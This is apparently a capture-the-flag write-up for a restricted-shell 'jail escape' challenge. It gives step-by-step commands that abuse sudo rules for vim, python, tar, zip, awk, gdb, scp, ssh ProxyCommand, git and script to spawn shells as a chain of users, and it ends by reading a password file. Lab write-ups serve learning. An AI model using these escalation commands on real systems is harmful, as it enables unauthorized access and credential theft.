Jail - Escape

Posted on ven. 03 décembre 2010 in Review

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://d00mfist.gitbooks.io/ctf/escaping_restricted_shell.html

User 1

app-script-ch14@challenge02:~$ vim --cmd "set shell=/bin/bash" --cmd "shell"

User 2

app-script-ch14@challenge02:~$ echo $PATH
/challenge/app-script/ch14/step1/
app-script-ch14@challenge02:~$ export PATH=/bin:/usr/bin
app-script-ch14@challenge02:~$ id
uid=1314(app-script-ch14) gid=1314(app-script-ch14) groups=1314(app-script-ch14),100(users)
app-script-ch14@challenge02:~$ sudo -l
Matching Defaults entries for app-script-ch14 on challenge02:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch14 may run the following commands on challenge02:
    (app-script-ch14-2) NOPASSWD: /usr/bin/python
app-script-ch14@challenge02:~$ sudo -u app-script-ch14-2 python
Python 2.7.15+ (default, Oct 7 2019, 17:39:04)
[GCC 7.4.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.

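>>> import pty
>>> pty.spawn('/bin/bash')

The sudoers rule shown by sudo -l allows /usr/bin/python as app-script-ch14-2 with NOPASSWD; because an interpreter can start any program, that rule is equivalent to granting a full shell as that user.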

User 3

https://gtfobins.github.io/gtfobins/tar/

app-script-ch14-2@challenge02:~$ sudo -u app-script-ch14-3 tar xf /dev/null -I '/bin/bash -c "bash <&2 1>&2"'

User 4

app-script-ch14-3@challenge02:~$ sudo -l
Matching Defaults entries for app-script-ch14-3 on challenge02:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch14-3 may run the following commands on challenge02:
    (app-script-ch14-4) NOPASSWD: /usr/bin/zip

sudo -u app-script-ch14-4 zip /tmp/test.zip /tmp/jk.sh -T --unzip-command="sh -c /bin/bash"

User 5

sudo -u app-script-ch14-5 awk '{system("/bin/bash");}'

User 6

sudo -u app-script-ch14-6 gdb

shell

User 7

sudo -u app-script-ch14-7 pico -s "/bin/bash"
/bin/bash
CTRL+T

User 8

Contents of /tmp/superscript:
/bin/bash

chmod +x /tmp/superscript
sudo -u app-script-ch14-8 scp -S /tmp/superscript 127.0.0.1: 127.0.0.1:

User 9

sudo -u app-script-ch14-9 env /bin/bash

User 10

sudo -u app-script-ch14-10 ssh -o ProxyCommand=';bash 0<&2 1>&2' 127.0.0.1

User 11

sudo -u app-script-ch14-11 git help status
!/bin/bash

mkdir /tmp/qspod
cd /tmp/qspod
git init
touch a
git add .
git commit -m "a"
chmod -R 777 .git
sudo -u app-script-ch14-11 git rebase --interactive --exec "/bin/bash" HEAD

User 12

vim /tmp/po
{/bin/bash}
chmod 777 /tmp/po
sudo -u app-script-ch14-13 /usr/bin/script /tmp/po

User 13

mapfile -t a < ../.passwd
echo $a